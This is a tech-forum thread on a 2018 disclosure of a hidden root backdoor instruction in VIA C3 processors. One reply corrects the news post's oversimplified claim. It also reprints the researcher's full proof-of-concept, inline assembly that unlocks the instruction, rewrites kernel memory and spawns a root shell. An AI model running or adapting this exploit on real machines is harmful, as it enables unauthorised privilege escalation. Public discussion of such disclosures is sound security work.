• Welcome to TechPowerUp Forums, Guest! Please check out our forum guidelines for info related to our community.

VIA C3 Processors Compromised by a Simple Shell Command

btarunr

Editor & Senior Moderator
Staff member
Joined
Oct 9, 2007
Messages
46,274 (7.69/day)
Location
Hyderabad, India
System Name RBMK-1000
Processor AMD Ryzen 7 5700G
Motherboard ASUS ROG Strix B450-E Gaming
Cooling DeepCool Gammax L240 V2
Memory 2x 8GB G.Skill Sniper X
Video Card(s) Palit GeForce RTX 2080 SUPER GameRock
Storage Western Digital Black NVMe 512GB
Display(s) BenQ 1440p 60 Hz 27-inch
Case Corsair Carbide 100R
Audio Device(s) ASUS SupremeFX S1220A
Power Supply Cooler Master MWE Gold 650W
Mouse ASUS ROG Strix Impact
Keyboard Gamdias Hermes E2
Software Windows 11 Pro
VIA processors probably make up an infinitesimal amount of the desktop PC market-share, and its makers market the chip only at pre-built machines such as digital-signage kiosks, information kiosks, ticket vending machines, ATMs, etc (which don't need a lot of processing power). At the Black Hat 2018 conference, security researcher Christopher Domas discovered that getting access to root privileges in Linux on a machine powered by VIA C3 "Nehemiah" processors is laughably easy. Just key in ".byte 0x0f, 0x3f" (without quotes) in any Linux CLI in user mode, and voila! You are now the root user.

Domas calls this his own iddqd (the cheat-code for "God Mode" in "Doom"). This backdoor, probably put in place by the processor's designers themselves, completely collapses the ring-based privilege system of the operating system, and elevates users and applications from the ring-2 (and above) userspace to ring 0 (root). It is an exploitation of a shadow-core, a hidden RISC processor within C7, which manages the startup, operation, and key storage of the x86 cores. Intel and AMD too have shadow-cores with similar functions.



View at TechPowerUp Main Site
 

Frick

Fishfaced Nincompoop
Joined
Feb 27, 2006
Messages
18,914 (2.86/day)
Location
Piteå
System Name Black MC in Tokyo
Processor Ryzen 5 5600
Motherboard Asrock B450M-HDV
Cooling Be Quiet! Pure Rock 2
Memory 2 x 16GB Kingston Fury 3400mhz
Video Card(s) XFX 6950XT Speedster MERC 319
Storage Kingston A400 240GB | WD Black SN750 2TB |WD Blue 1TB x 2 | Toshiba P300 2TB | Seagate Expansion 8TB
Display(s) Samsung U32J590U 4K + BenQ GL2450HT 1080p
Case Fractal Design Define R4
Audio Device(s) Line6 UX1 + some headphones, Nektar SE61 keyboard
Power Supply Corsair RM850x v3
Mouse Logitech G602
Keyboard Cherry MX Board 1.0 TKL Brown
VR HMD Acer Mixed Reality Headset
Software Windows 10 Pro
Benchmark Scores Rimworld 4K ready!
The things still having these must be truly ancient. Released in 2003, if it's just a Nehemiah thing and not universal to the C cores.
 
Joined
Oct 22, 2014
Messages
13,210 (3.83/day)
Location
Sunshine Coast
System Name Black Box
Processor Intel Xeon E3-1260L v5
Motherboard MSI E3 KRAIT Gaming v5
Cooling Tt tower + 120mm Tt fan
Memory G.Skill 16GB 3600 C18
Video Card(s) Asus GTX 970 Mini
Storage Kingston A2000 512Gb NVME
Display(s) AOC 24" Freesync 1m.s. 75Hz
Case Corsair 450D High Air Flow.
Audio Device(s) No need.
Power Supply FSP Aurum 650W
Mouse Yes
Keyboard Of course
Software W10 Pro 64 bit
" its makers market the chip only at pre-built machines such as digital-signage kiosks, information kiosks, ticket vending machines, ATMs, etc "
Most probably run on XP embedded.
 
Last edited:

FordGT90Concept

"I go fast!1!11!1!"
Joined
Oct 13, 2008
Messages
26,259 (4.65/day)
Location
IA, USA
System Name BY-2021
Processor AMD Ryzen 7 5800X (65w eco profile)
Motherboard MSI B550 Gaming Plus
Cooling Scythe Mugen (rev 5)
Memory 2 x Kingston HyperX DDR4-3200 32 GiB
Video Card(s) AMD Radeon RX 7900 XT
Storage Samsung 980 Pro, Seagate Exos X20 TB 7200 RPM
Display(s) Nixeus NX-EDG274K (3840x2160@144 DP) + Samsung SyncMaster 906BW (1440x900@60 HDMI-DVI)
Case Coolermaster HAF 932 w/ USB 3.0 5.25" bay + USB 3.2 (A+C) 3.5" bay
Audio Device(s) Realtek ALC1150, Micca OriGen+
Power Supply Enermax Platimax 850w
Mouse Nixeus REVEL-X
Keyboard Tesoro Excalibur
Software Windows 10 Home 64-bit
Benchmark Scores Faster than the tortoise; slower than the hare.
So simple and so effective, one has to wonder if this is an unintentional exploit or an intentional backdoor.
 
Joined
Dec 16, 2017
Messages
2,720 (1.19/day)
Location
Buenos Aires, Argentina
System Name System V
Processor AMD Ryzen 5 3600
Motherboard Asus Prime X570-P
Cooling Cooler Master Hyper 212 // a bunch of 120 mm Xigmatek 1500 RPM fans (2 ins, 3 outs)
Memory 2x8GB Ballistix Sport LT 3200 MHz (BLS8G4D32AESCK.M8FE) (CL16-18-18-36)
Video Card(s) Gigabyte AORUS Radeon RX 580 8 GB
Storage SHFS37A240G / DT01ACA200 / WD20EZRX / MKNSSDTR256GB-3DL / LG BH16NS40 / ST10000VN0008
Display(s) LG 22MP55 IPS Display
Case NZXT Source 210
Audio Device(s) Logitech G430 Headset
Power Supply Corsair CX650M
Mouse Microsoft Trackball Optical 1.0
Keyboard HP Vectra VE keyboard (Part # D4950-63004)
Software Whatever build of Windows 11 is being served in Dev channel at the time.
Benchmark Scores Corona 1.3: 3120620 r/s Cinebench R20: 3355 FireStrike: 12490 TimeSpy: 4624
Honestly, I can only think three scenarios for this to exist:

1-It was a feature designed for better testing/debugging of engineering samples (for whatever reason), and they forgot to remove it in the final product.
2-Make jumping from any ring to ring 0 much faster (supposedly, jumping from any ring to another is rather expensive), but forgot to add security measures, or the feature got scraped, and again, forgot to actually remove it.
3-It's an actual backdoor, built specifically for that purpose.
 
Joined
Jul 16, 2014
Messages
8,115 (2.29/day)
Location
SE Michigan
System Name Dumbass
Processor AMD Ryzen 7800X3D
Motherboard ASUS TUF gaming B650
Cooling Artic Liquid Freezer 2 - 420mm
Memory G.Skill Sniper 32gb DDR5 6000
Video Card(s) GreenTeam 4070 ti super 16gb
Storage Samsung EVO 500gb & 1Tb, 2tb HDD, 500gb WD Black
Display(s) 1x Nixeus NX_EDG27, 2x Dell S2440L (16:9)
Case Phanteks Enthoo Primo w/8 140mm SP Fans
Audio Device(s) onboard (realtek?) - SPKRS:Logitech Z623 200w 2.1
Power Supply Corsair HX1000i
Mouse Steeseries Esports Wireless
Keyboard Corsair K100
Software windows 10 H
Benchmark Scores https://i.imgur.com/aoz3vWY.jpg?2
Honestly, I can only think three scenarios for this to exist:

1-It was a feature designed for better testing/debugging of engineering samples (for whatever reason), and they forgot to remove it in the final product.
2-Make jumping from any ring to ring 0 much faster (supposedly, jumping from any ring to another is rather expensive), but forgot to add security measures, or the feature got scraped, and again, forgot to actually remove it.
3-It's an actual backdoor, built specifically for that purpose.
1 intentional, they didnt forget
2 intentional, never were going to remove or secure it.
3 Government request likely.

Iirc, the chip was supposed to be the next best thing for IoT, until ARM and SoC.
 
Joined
Mar 26, 2010
Messages
9,762 (1.91/day)
Location
Jakarta, Indonesia
System Name micropage7
Processor Intel Xeon X3470
Motherboard Gigabyte Technology Co. Ltd. P55A-UD3R (Socket 1156)
Cooling Enermax ETS-T40F
Memory Samsung 8.00GB Dual-Channel DDR3
Video Card(s) NVIDIA Quadro FX 1800
Storage V-GEN03AS18EU120GB, Seagate 2 x 1TB and Seagate 4TB
Display(s) Samsung 21 inch LCD Wide Screen
Case Icute Super 18
Audio Device(s) Auzentech X-Fi Forte
Power Supply Silverstone 600 Watt
Mouse Logitech G502
Keyboard Sades Excalibur + Taihao keycaps
Software Win 7 64-bit
Benchmark Scores Classified
compromised, but how many user that use C3
 
Joined
Jun 10, 2014
Messages
2,889 (0.81/day)
Processor AMD Ryzen 9 5900X ||| Intel Core i7-3930K
Motherboard ASUS ProArt B550-CREATOR ||| Asus P9X79 WS
Cooling Noctua NH-U14S ||| Be Quiet Pure Rock
Memory Crucial 2 x 16 GB 3200 MHz ||| Corsair 8 x 8 GB 1333 MHz
Video Card(s) MSI GTX 1060 3GB ||| MSI GTX 680 4GB
Storage Samsung 970 PRO 512 GB + 1 TB ||| Intel 545s 512 GB + 256 GB
Display(s) Asus ROG Swift PG278QR 27" ||| Eizo EV2416W 24"
Case Fractal Design Define 7 XL x 2
Audio Device(s) Cambridge Audio DacMagic Plus
Power Supply Seasonic Focus PX-850 x 2
Mouse Razer Abyssus
Keyboard CM Storm QuickFire XT
Software Ubuntu
So simple and so effective, one has to wonder if this is an unintentional exploit or an intentional backdoor.
When it's a dedicated instruction, then it's obviously intentional.
Adding debugging features is very common, and is probably done in every single microchip. But this type of debugging is usually disabled or removed right before mass production, and it's easy to forget something in the final push before a due date.

Still, sometimes they leave stuff there because it's "useful"…
 
Joined
Sep 24, 2008
Messages
2,665 (0.47/day)
System Name Dire Wolf IV
Processor Intel Core i9 14900K
Motherboard Asus ROG STRIX Z790-I GAMING WIFI
Cooling Arctic Liquid Freezer II 280
Memory 2x24GB Corsair DDR5 6667
Video Card(s) NVIDIA RTX4080 FE
Storage AORUS Gen4 7300 1TB + Western Digital SN750 500GB
Display(s) Alienware AW3423DWF (QD-OLED, 3440x1440, 165hz)
Case Corsair Airflow 2000D
Power Supply Corsair SF1000L
Mouse Razer Deathadder Essential
Keyboard Chuangquan CQ84
Software Windows 11 Professional
This "article" is hilarious.

Just key in ".byte 0x0f, 0x3f" (without quotes) in any Linux CLI in user mode, and voila! You are now the root user.

No, that is not how it works. This makes it clear that the author has no idea how this exploit functions, and did not do even a minimal amount of research.

The exploit requires three steps:
1) Writing a CPU configuration register with the wrmsr instruction (MSR 1107, bit 0 - Set to 1). This enables the 0x0f3f instruction. This is only possible from within Ring 0 - Except on a certain subset of C3 CPUs which have this bit enabled by default (C3 Samuel 2 - 0x0C5B), which makes the 0x0f3f instruction always available. A trivial mitigation for the latter case is to have the Kernel write this MSR bit to zero as it loads once it knows that it runs on a CPU of the affected family. With this bit disabled, the exploit is not possible. It can likely also be fixed via BIOS or uCode updates, but who is going to bother for a platform or CPU that old.
2) Using the embedded RISC code to execute a series of instructions that would manipulate Linux Kernel memory to escalate your privilege to become root. These instructions will bypass kernel memory protections because they are not active when the RISC core is executing.
3) Launch a shell (which will open as root) to complete the privilege escalation.

This isn't even remotely close to ".byte 0x0f, 0x3f" in the CLI, which will do nothing.

This is the actual payload used for the exploit (source is his DefCon26 presentation):
Code:
/* unlock the backdoor */
__asm__ ("movl $payload, %eax");
__asm__ (".byte 0x0f, 0x3f");
/* modify kernel memory */
__asm__ ("payload:");
__asm__ ("bound %eax,0xa310075b(,%eax,1)");
__asm__ ("bound %eax,0x24120078(,%eax,1)");
__asm__ ("bound %eax,0x80d2c5d0(,%eax,1)");
__asm__ ("bound %eax,0x0a1af97f(,%eax,1)");
__asm__ ("bound %eax,0xc8109489(,%eax,1)");
__asm__ ("bound %eax,0x0a1af97f(,%eax,1)");
__asm__ ("bound %eax,0xc8109c89(,%eax,1)");
__asm__ ("bound %eax,0xc5e998d7(,%eax,1)");
__asm__ ("bound %eax,0xac128751(,%eax,1)");
__asm__ ("bound %eax,0x844475e0(,%eax,1)");
__asm__ ("bound %eax,0x84245de2(,%eax,1)");
__asm__ ("bound %eax,0x8213e5d5(,%eax,1)");
__asm__ ("bound %eax,0x24115f20(,%eax,1)");
__asm__ ("bound %eax,0x2412c133(,%eax,1)");
__asm__ ("bound %eax,0xa2519433(,%eax,1)");
__asm__ ("bound %eax,0x80d2c5d0(,%eax,1)");
__asm__ ("bound %eax,0xc8108489(,%eax,1)");
__asm__ ("bound %eax,0x24120208(,%eax,1)");
__asm__ ("bound %eax,0x80d2c5d0(,%eax,1)");
__asm__ ("bound %eax,0xc8108489(,%eax,1)");
__asm__ ("bound %eax,0x24120000(,%eax,1)");
__asm__ ("bound %eax,0x24110004(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe01095fd(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe01095fd(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe0108dfd(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe0108dfd(,%eax,1)");
/* launch a shell */
system("/bin/bash");

This backdoor, probably put in place by the processor's designers themselves

Probably? Who else manipulates the RTL for an x86 processor if not the designers themselves. Heck, even if it was a malicious backdoor installed by the request of a government (spoiler: It most likely isn't, so the tinfoil hats can go back into storage), it was still put in place by the designers themselves. Judging by the fact that it was enabled by default only on a subset of the CPUs, this is likely an unfinished feature, or a debug functionality, that was left enabled by default as a result of a mistake. Such unsecured debug feature bugs are extremely common in HW.

It is an exploitation of a shadow-core, a hidden RISC processor within C7, which manages the startup, operation, and key storage of the x86 cores

Anyway, this core is not the SMM, or any manageability-related core which is what Intel and AMD have been repeatedly lampooned about. It is different, and its functionality is not well understood. It is a core that shares the CPU's execution resources (such as registers), which makes it very special indeed, and what enabled Domas to craft his attack. The one hallway speculation I heard was that this core was intended to be used (ironically) for cryptographic offloads, thus to be used to provide security related features.

EDIT: You can read documentation about this feature in the C3 Datasheet on page 80. Here it is.

Not to mention that this article explains nothing of the process Mr. Domas had to go through to discover this (such as reading through patents, narrowing down to the exact bit that would enable the instruction, reverse-engineering the RISC instruction set of the RISC core, writing an assembler for the RISC core and finally crafting the payload), which is the truly interesting part of the story, and what showcases his genius.

You can see his presentation on the DefCon26 media server (Edit: Fixed link). This is pretty much the same one as presented at Blackhat.
 
Last edited:
Joined
Feb 14, 2012
Messages
2,304 (0.52/day)
System Name msdos
Processor 8086
Motherboard mainboard
Cooling passive
Memory 640KB + 384KB extended
Video Card(s) EGA
Storage 5.25"
Display(s) 80x25
Case plastic
Audio Device(s) modchip
Power Supply 45 watts
Mouse serial
Keyboard yes
Software disk commander
Benchmark Scores still running
Per a detailed reddit post, the C3 cpu has to be configured first to enable this feature. It's actually documented, and not a hidden thing. Maybe some motherboard vendor accidentally configured things wrong if it's available natively.
 
Joined
Nov 5, 2014
Messages
714 (0.21/day)
Worth noting that this is a 17 year old CPU, not like anyone's gonna be using it on their server or anything lol.
 
Joined
Dec 30, 2010
Messages
2,082 (0.43/day)
Worth noting that this is a 17 year old CPU, not like anyone's gonna be using it on their server or anything lol.

You have'nt read; these embedded CPU's or systems are still widely used all over the world, that dont need rough CPU power, and work on the mainframe basis (mainframe > client). Many ATM's still operate on embedded systems, VIA was one of them.
 
Joined
Jul 6, 2008
Messages
33 (0.01/day)
Since this could affect ATMs, I wonder if this is the cause of the FBI alert to banks this week about a possible ATM cashout attack? (and funny enough, I just did a search and it looks like an Indian bank got hit for over $11 million in unauthorized ATM withdrawls)
 
Top